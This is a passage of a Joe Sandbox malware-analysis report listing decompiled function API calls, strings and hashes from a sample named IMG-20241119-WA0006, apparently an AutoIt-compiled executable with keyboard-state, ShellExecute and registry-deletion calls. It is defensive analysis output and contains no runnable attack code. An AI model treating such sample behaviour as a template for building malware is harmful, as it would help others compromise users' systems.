__mtinitlocknum.LIBCMT ref: 000AA991

Part of subcall function 000A7D7C: __FF_MSGBANNER.LIBCMT ref: 000A7D91
Part of subcall function 000A7D7C: __NMSG_WRITE.LIBCMT ref: 000A7D98
Part of subcall function 000A7D7C: __malloc_crt.LIBCMT ref: 000A7DB8

__lock.LIBCMT ref: 000AA9A4
__lock.LIBCMT ref: 000AA9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00136DE0,00000018,000B5E7B,?,00000000,00000109), ref: 000AAA0C
EnterCriticalSection.KERNEL32(8000000C,00136DE0,00000018,000B5E7B,?,00000000,00000109), ref: 000AAA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 000AAA39

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 4ab0bb5aa6044aece5cc2e23630427d444e468156d8f1432cfe6623209351f21
Instruction ID: a2bb79dc31a36648c761484ad8953c3f89c05f0b2a81357ba2408b57d9dba925
Opcode Fuzzy Hash: 4ab0bb5aa6044aece5cc2e23630427d444e468156d8f1432cfe6623209351f21
Instruction Fuzzy Hash: B4412871B006019BEB249FE8D94479DB7F0AF17334F158329E529AB2E2D7B49840CB92

Function 000E8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 000E8EE4
GetDC.USER32(00000000), ref: 000E8EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 000E8EF7
ReleaseDC.USER32(00000000,00000000), ref: 000E8F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 000E8F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000E8F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,000EBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 000E8F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000E8FAA

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 869abf2b15f86e50887a61fc7016e66960acfc3dcaf1ddd64d3f71f5fb60abbe
Instruction ID: 95e6cc09143e983f65c993395355b7cbf7e309825eda83ea78b8efb9ce759c38
Opcode Fuzzy Hash: 869abf2b15f86e50887a61fc7016e66960acfc3dcaf1ddd64d3f71f5fb60abbe
Instruction Fuzzy Hash: 16317F72100254BFEB108F95DC49FEB3BADEF49715F044065FE48AA191DAB59881CB70

Function 000D16DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

Part of subcall function 0009C6F4: _wcscpy.LIBCMT ref: 0009C717

_wcstok.LIBCMT ref: 000D184E
_wcscpy.LIBCMT ref: 000D18DD
_memset.LIBCMT ref: 000D1910

Strings

X, xrefs: 000D1948

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: c834440419a247d13b7d06ea0d125dd6e639dce42654995fd13860e5e611cec9
Instruction ID: 17b3bd4220588dd7790f8fce5878be8fae9549a886193f5d6d90f53910abbf79
Opcode Fuzzy Hash: c834440419a247d13b7d06ea0d125dd6e639dce42654995fd13860e5e611cec9
Instruction Fuzzy Hash: AFC17D31508340AFC764EF64C895ADAB7E4BF95350F04492EF89A973A2DB30ED05CB92

Function 000F0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

GetSystemMetrics.USER32(0000000F), ref: 000F016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 000F038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 000F03AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 000F03D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 000F03FF
ShowWindow.USER32(00000003,00000000), ref: 000F0421
DefDlgProcW.USER32(?,00000005,?,?), ref: 000F0440

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: 63a2589c90bc97d29b354cde6b28641df6d07cb1ccf9d2f26abc8d4a1850f33a
Instruction ID: 7454fc281396f2abbe0f6b603fdaa501b62ca40809db57c423b28870b6041036
Opcode Fuzzy Hash: 63a2589c90bc97d29b354cde6b28641df6d07cb1ccf9d2f26abc8d4a1850f33a
Instruction Fuzzy Hash: 31A1103560061AEFDB18CF68C9857BDBBF5BF48700F048115EE54A7692D770AE90EB90

Function 0009AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1827f71a050a52bc20fd0b9ecf0440b7307a1477b108c3e8388b496c90b30c1c
Instruction ID: 59ae8f9f0179c5818ef3602da588a226d822e1788b07422a05611681af6150ed
Opcode Fuzzy Hash: 1827f71a050a52bc20fd0b9ecf0440b7307a1477b108c3e8388b496c90b30c1c
Instruction Fuzzy Hash: 69715DB1A00109EFCF14CF98CC89ABEBBB5FF86314F248159F915A6251C734AA51DFA1

Function 000E2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000E225A
_memset.LIBCMT ref: 000E2323
ShellExecuteExW.SHELL32(?), ref: 000E2368

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

Part of subcall function 0009C6F4: _wcscpy.LIBCMT ref: 0009C717

CloseHandle.KERNEL32(00000000), ref: 000E242F
FreeLibrary.KERNEL32(00000000), ref: 000E243E

Strings

@, xrefs: 000E2334

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: c9adea69b5e58eec6de8b419c508256bcfbca0983dcad5e0d339ad4e39ace5a9
Instruction ID: 22333bad2dd59ac33843285b4ec89416423b212adb212a1b590e6b1bcaf89cb3
Opcode Fuzzy Hash: c9adea69b5e58eec6de8b419c508256bcfbca0983dcad5e0d339ad4e39ace5a9
Instruction Fuzzy Hash: 1F715DB1A006599FCF15EFA5D8859AEB7F5FF48310F108459E855BB392CB34AE40CB90

Function 000C3DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 000C3DE7
GetKeyboardState.USER32(?), ref: 000C3DFC
SetKeyboardState.USER32(?), ref: 000C3E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 000C3E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 000C3EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 000C3EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 000C3F13

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: cb5f11b7c1b23486b29757cd1d9edfa8bf77a243bd53ae9c0230153fbac23f79
Instruction ID: c75a8d8c483442d6d60d996bf616cfd0d8c343d7a66019dab58b52f1cf1e8fec
Opcode Fuzzy Hash: cb5f11b7c1b23486b29757cd1d9edfa8bf77a243bd53ae9c0230153fbac23f79
Instruction Fuzzy Hash: A351DFA0A247D53DFB3643248C45FBE7EE96B06304F08888CF1D5568C3D2A8AEC5D760

Function 000C3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 000C3C02
GetKeyboardState.USER32(?), ref: 000C3C17
SetKeyboardState.USER32(?), ref: 000C3C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 000C3CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 000C3CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 000C3D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 000C3D26

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 345487013478c3666cb671fad4809cfbd2ce3c2d298b978900fc102968ef2714
Instruction ID: a411c1b4610f0041605282ecd18ca35ba890a374e98a49cebd1585cc0f1ca62f
Opcode Fuzzy Hash: 345487013478c3666cb671fad4809cfbd2ce3c2d298b978900fc102968ef2714
Instruction Fuzzy Hash: 9B51D1A05247D53DFB3683648C56FBEBEE96B06300F08C48CE5D65A8C2D695EE84E760

Function 000C7DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 000C7DBE
_wcsncpy.LIBCMT ref: 000C7DF3
_wcsncpy.LIBCMT ref: 000C7E25
_wcsncpy.LIBCMT ref: 000C7E58
_wcsncpy.LIBCMT ref: 000C7E9A
_wcsncpy.LIBCMT ref: 000C7ED4
_wcsncpy.LIBCMT ref: 000C7F03

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: cf9b8254aec6e561f4627d6bd2396d22c6888a7e6c8b0f0019d1133363a4ceca
Instruction ID: 5e9ef79fa99f2842b1e722575589e21db075545bd52a0693b2251c51490c781c
Opcode Fuzzy Hash: cf9b8254aec6e561f4627d6bd2396d22c6888a7e6c8b0f0019d1133363a4ceca
Instruction Fuzzy Hash: B1417366C1021876DF10EBF4C88AACF77AC9F06310F50897AE518E3163F634D61587A5

Function 0009B63C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0009B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0009B66C
GetAsyncKeyState.USER32(00000001), ref: 0009B691
GetAsyncKeyState.USER32(00000002), ref: 0009B69F

Strings

806ddv806ddv806ddv806ddv806ddv866ddv866ddv886ddv896ddv886ddv856ddv8e6ddv826ddv8f6ddv8e6ddv8f6ddv8f6ddv8f6ddv8f6ddv8b6ddv896ddv866d, xrefs: 000FDFDC

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID: 806ddv806ddv806ddv806ddv806ddv866ddv866ddv886ddv896ddv886ddv856ddv8e6ddv826ddv8f6ddv8e6ddv8f6ddv8f6ddv8f6ddv8f6ddv8b6ddv896ddv866d
API String ID: 4210589936-3192337943
Opcode ID: e9f77112ea6d2061462f9c64a3a7f2d8b1c6186daf906ab6683ae798f9b1c6d7
Instruction ID: 2bf51be2a989cfa429ac0fd91735d9180343f6c5b8c9f40a5644f9640469c06d
Opcode Fuzzy Hash: e9f77112ea6d2061462f9c64a3a7f2d8b1c6186daf906ab6683ae798f9b1c6d7
Instruction Fuzzy Hash: F7418E35508119BFCF159F64C844EEDBBB5BB05324F10432AE869922E0CB34A994EF91

Function 000E3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 000E3DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000E3DCB
FreeLibrary.KERNEL32(00000000), ref: 000E3E80

Part of subcall function 000E3D72: RegCloseKey.ADVAPI32(?), ref: 000E3DE8
Part of subcall function 000E3D72: FreeLibrary.KERNEL32(?), ref: 000E3E3A
Part of subcall function 000E3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 000E3E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 000E3E25

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: c95e3eee5b7b918952119b8b1392e8b868fd99503839a48edb75339979c87ca4
Instruction ID: 3a9e63f6ec84a2553bb18066daf54dca796e628fd02dac30fa13b7be935b4525
Opcode Fuzzy Hash: c95e3eee5b7b918952119b8b1392e8b868fd99503839a48edb75339979c87ca4
Instruction Fuzzy Hash: 9B31EDB1901149BFDB559BD5EC89AFFBBBCEF08300F00016AF552A3291D6749F859B60

Function 000E8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000E8FE7
GetWindowLongW.USER32(00F2EFA8,000000F0), ref: 000E901A
GetWindowLongW.USER32(00F2EFA8,000000F0), ref: 000E904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 000E9081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 000E90AB
GetWindowLongW.USER32(00000000,000000F0), ref: 000E90BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000E90D6

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d0533ed4ee606db83bab88b5fc004bdbb8e1bb3daf3948dc305ae7e3f3409b76
Instruction ID: 1309ef187b1d5f770bcf39f81e8650886196d5ab4cbd6d1b62244602b2886258
Opcode Fuzzy Hash: d0533ed4ee606db83bab88b5fc004bdbb8e1bb3daf3948dc305ae7e3f3409b76
Instruction Fuzzy Hash: 0F315774600254EFDB60CF99DC88FA437E6FB4A314F154164F6199B6B2CBB2A880CB40

Function 000C08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C08F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C0918
SysAllocString.OLEAUT32(00000000), ref: 000C091B
SysAllocString.OLEAUT32(?), ref: 000C0939
SysFreeString.OLEAUT32(?), ref: 000C0942
StringFromGUID2.OLE32(?,?,00000028), ref: 000C0967
SysAllocString.OLEAUT32(?), ref: 000C0975

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 632b4261bb590b25085cbabc099edc16b773a6b39da1f5351d3bfddbe768b5ef
Instruction ID: 39dc16a81db5685da8a4cdbd3b4d57007e95eeec6435c447d83b15d0d0dac2eb
Opcode Fuzzy Hash: 632b4261bb590b25085cbabc099edc16b773a6b39da1f5351d3bfddbe768b5ef
Instruction Fuzzy Hash: 0E216576601219AFEF109FA8DC88EBF77ECEB09360B408125F955DB161D670EC45CB60

Function 000C2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 000C2485
__wcsnicmp.LIBCMT ref: 000C24A6
__wcsnicmp.LIBCMT ref: 000C24C0

Strings

#requireadmin, xrefs: 000C24A0
#notrayicon, xrefs: 000C247D
#OnAutoItStartRegister, xrefs: 000C24BA

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 360225fbb49d0d0ed8e449d1874b6441c2bc29b3bd6ec33f615f899b52f540f5
Instruction ID: 98056c1591a79784e16e956cc72a415a3e848e021c37ca7dc4430673baf39ddf
Opcode Fuzzy Hash: 360225fbb49d0d0ed8e449d1874b6441c2bc29b3bd6ec33f615f899b52f540f5
Instruction Fuzzy Hash: CA213732204A1167D734BB74AC12FFF73D8EF65310F10802DF44697482EB659982D3A5

Function 000C0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C09CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C09F1
SysAllocString.OLEAUT32(00000000), ref: 000C09F4
SysAllocString.OLEAUT32 ref: 000C0A15
SysFreeString.OLEAUT32 ref: 000C0A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 000C0A38
SysAllocString.OLEAUT32(?), ref: 000C0A46

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: ef5fe022df4de38c583144f4983b91af964b65d7f59a19b3aab28afb9a728cc1
Instruction ID: 5f622068f45b32e82021b683f2bbe4e91220c18b49b8cf422a9111ee0d2090f4
Opcode Fuzzy Hash: ef5fe022df4de38c583144f4983b91af964b65d7f59a19b3aab28afb9a728cc1
Instruction Fuzzy Hash: 8A213275600204AFDB109BE8DC89EBE77ECEF083607408129F949CB661DAB0EC81D765

Function 000EA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0009D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009D1BA
Part of subcall function 0009D17C: GetStockObject.GDI32(00000011), ref: 0009D1CE
Part of subcall function 0009D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0009D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 000EA32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 000EA33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 000EA345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 000EA354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 000EA360

Strings

Msctls_Progress32, xrefs: 000EA2FE

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 8310e3a4859446ec1c43cb02753b8de59e1bfd24db9d7be5316305017186fb44
Instruction ID: 7235a8e40f87722f1216137b5ada5818939158031df5bb22afe18a6a78730da1
